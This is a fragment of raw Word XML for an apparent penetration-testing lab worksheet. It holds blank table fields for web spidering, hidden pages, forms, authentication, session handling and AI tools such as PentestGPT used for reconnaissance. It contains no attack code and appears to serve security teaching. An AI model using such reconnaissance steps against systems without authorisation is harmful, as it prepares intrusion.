          <w:p w14:paraId="7EDF0496" w14:textId="77777777" w:rsidR="00102667" w:rsidRPr="00960A4F" w:rsidRDefault="00102667" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CBFF909" w14:textId="2F006237" w:rsidR="00102667" w:rsidRPr="00C54B08" w:rsidRDefault="00102667" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Potential Vulnerabilities Indicated by Errors?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24AECF25" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="745CE76D" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7BC1A28F" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A75A8D" w14:paraId="24C3C580" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:trPr>
          <w:trHeight w:val="1790"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B059A86" w14:textId="41DA85F9" w:rsidR="00A75A8D" w:rsidRPr="00960A4F" w:rsidRDefault="00A75A8D" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00960A4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>AI Tools Used for Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6DB06FF4" w14:textId="77777777" w:rsidR="00A75A8D" w:rsidRPr="00C54B08" w:rsidRDefault="00A75A8D" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A75A8D" w14:paraId="67DAC396" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:trPr>
          <w:trHeight w:val="1610"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CD9C4FF" w14:textId="482C6403" w:rsidR="00A75A8D" w:rsidRPr="00960A4F" w:rsidRDefault="00A75A8D" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00960A4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Scripts or </w:t>
            </w:r>
            <w:r w:rsidR="000B6F82">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AI </w:t>
            </w:r>
            <w:r w:rsidRPr="00960A4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="596737F6" w14:textId="77777777" w:rsidR="00A75A8D" w:rsidRPr="00C54B08" w:rsidRDefault="00A75A8D" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A75A8D" w14:paraId="1CFD89FD" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:trPr>
          <w:trHeight w:val="1790"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="560C078A" w14:textId="31D5BF40" w:rsidR="00A75A8D" w:rsidRPr="00960A4F" w:rsidRDefault="00960A4F" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00960A4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Identified Server-Side Technologies (via AI-based reconnaissance)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="268A26C1" w14:textId="77777777" w:rsidR="00A75A8D" w:rsidRPr="00C54B08" w:rsidRDefault="00A75A8D" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00960A4F" w14:paraId="2280552B" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:trPr>
          <w:trHeight w:val="1430"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17CAED85" w14:textId="365047B4" w:rsidR="00960A4F" w:rsidRPr="00960A4F" w:rsidRDefault="0016436F" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="6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Other </w:t>
            </w:r>
            <w:r w:rsidR="00960A4F" w:rsidRPr="00960A4F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tools/Services Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="56E5A682" w14:textId="77777777" w:rsidR="00960A4F" w:rsidRPr="00C54B08" w:rsidRDefault="00960A4F" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65CA6C7F" w14:textId="77777777" w:rsidR="00960A4F" w:rsidRPr="00C54B08" w:rsidRDefault="00960A4F" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F06CA00" w14:textId="77777777" w:rsidR="00960A4F" w:rsidRPr="00C54B08" w:rsidRDefault="00960A4F" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="591B1D83" w14:textId="77777777" w:rsidR="00820F0B" w:rsidRPr="00A51A96" w:rsidRDefault="00820F0B" w:rsidP="00820F0B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0F0B" w14:paraId="4B49B01D" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:trPr>
          <w:trHeight w:val="5147"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0048127B" w14:textId="77777777" w:rsidR="00820F0B" w:rsidRDefault="00820F0B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="33186E3C" w14:textId="77777777" w:rsidR="00820F0B" w:rsidRDefault="00820F0B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02752927" w14:textId="00C49743" w:rsidR="00670DB7" w:rsidRDefault="00670DB7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3E764D" w:rsidRPr="000F3EF2" w14:paraId="5E475873" w14:textId="77777777" w:rsidTr="00AD1B7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6C5399FC" w14:textId="4D3D820E" w:rsidR="003E764D" w:rsidRPr="000F3EF2" w:rsidRDefault="003E764D" w:rsidP="008519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1.7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265903" w:rsidRPr="00265903">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Perform Web Spidering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C308462" w14:textId="77777777" w:rsidR="003E764D" w:rsidRPr="006552F2" w:rsidRDefault="003E764D" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="4"/>
          <w:szCs w:val="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3037"/>
        <w:gridCol w:w="4495"/>
      </w:tblGrid>
      <w:tr w:rsidR="00680982" w14:paraId="363BBA01" w14:textId="77777777" w:rsidTr="003D68CE">
        <w:trPr>
          <w:trHeight w:val="935"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A818A73" w14:textId="09D135A4" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00893B76">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Discovered Elements</w:t>
            </w:r>
            <w:r w:rsidRPr="006353B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36A93BBD" w14:textId="343626FD" w:rsidR="00680982" w:rsidRPr="00C54B08" w:rsidRDefault="00680982" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA3EA7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hidden Pages Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74C39DE9" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F8DFCD7" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="55298E0F" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00680982" w14:paraId="401C9C8F" w14:textId="77777777" w:rsidTr="003D68CE">
        <w:trPr>
          <w:trHeight w:val="620"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2C5B8910" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EA5F657" w14:textId="20E21488" w:rsidR="00680982" w:rsidRPr="00C54B08" w:rsidRDefault="00680982" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Input Fields &amp; Forms Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FE8450A" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1CAD7DE1" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46C2F422" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00680982" w14:paraId="19FE502A" w14:textId="77777777" w:rsidTr="00EA3EA7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="24AEFC7B" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6818CF0D" w14:textId="5A16A8E5" w:rsidR="00680982" w:rsidRPr="00C54B08" w:rsidRDefault="00680982" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Authentication Mechanisms Discovered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ACC13CB" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22202612" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4661336A" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00680982" w14:paraId="6C794659" w14:textId="77777777" w:rsidTr="00EA3EA7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4C5608E4" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B9FDE0F" w14:textId="78BF4A38" w:rsidR="00680982" w:rsidRPr="00C54B08" w:rsidRDefault="00680982" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Session Handling Observations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F16A703" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0311F576" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63025B66" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00680982" w14:paraId="364D4AAF" w14:textId="77777777" w:rsidTr="003D68CE">
        <w:trPr>
          <w:trHeight w:val="557"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="390016C7" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5376AEDA" w14:textId="643B8FAF" w:rsidR="00680982" w:rsidRPr="00C54B08" w:rsidRDefault="00680982" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Client-Side JavaScript Requests/Responses Analyzed</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B1EC3E1" w14:textId="77777777" w:rsidR="00680982" w:rsidRDefault="00680982" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B12769" w14:paraId="4530CCCA" w14:textId="77777777" w:rsidTr="00EA3EA7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="038CC390" w14:textId="45007643" w:rsidR="00B12769" w:rsidRPr="00310D3A" w:rsidRDefault="008B458B" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B458B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>AI-Based Web Spidering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A372F46" w14:textId="46078DC0" w:rsidR="00B12769" w:rsidRPr="00C54B08" w:rsidRDefault="008B458B" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>AI Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="421D609A" w14:textId="7F1FF41B" w:rsidR="00B12769" w:rsidRPr="008B458B" w:rsidRDefault="008B458B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008B458B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*PentestGPT, Custom AI Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C0FDB6B" w14:textId="77777777" w:rsidR="00B12769" w:rsidRDefault="00B12769" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="07619228" w14:textId="77777777" w:rsidR="00B12769" w:rsidRDefault="00B12769" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B12769" w14:paraId="48AB4FA9" w14:textId="77777777" w:rsidTr="00EA3EA7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C2D4D6D" w14:textId="77777777" w:rsidR="00B12769" w:rsidRDefault="00B12769" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71004BF3" w14:textId="01E61B29" w:rsidR="00B12769" w:rsidRPr="00C54B08" w:rsidRDefault="0034565C" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="336EA523" w14:textId="77777777" w:rsidR="00B12769" w:rsidRDefault="00B12769" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36C1ECEF" w14:textId="77777777" w:rsidR="00B12769" w:rsidRDefault="00B12769" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B12769" w14:paraId="4D235EB2" w14:textId="77777777" w:rsidTr="00EA3EA7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F1BE121" w14:textId="77777777" w:rsidR="00B12769" w:rsidRDefault="00B12769" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B98ADEB" w14:textId="2A4C3519" w:rsidR="00B12769" w:rsidRPr="00C54B08" w:rsidRDefault="0034565C" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Extracted Hyperlinks &amp; Saved Output File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B54DED2" w14:textId="0A8BF598" w:rsidR="00B12769" w:rsidRDefault="00B12769" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009A5267">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidR="0034565C" w:rsidRPr="0034565C">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Web_spider.txt or similar</w:t>
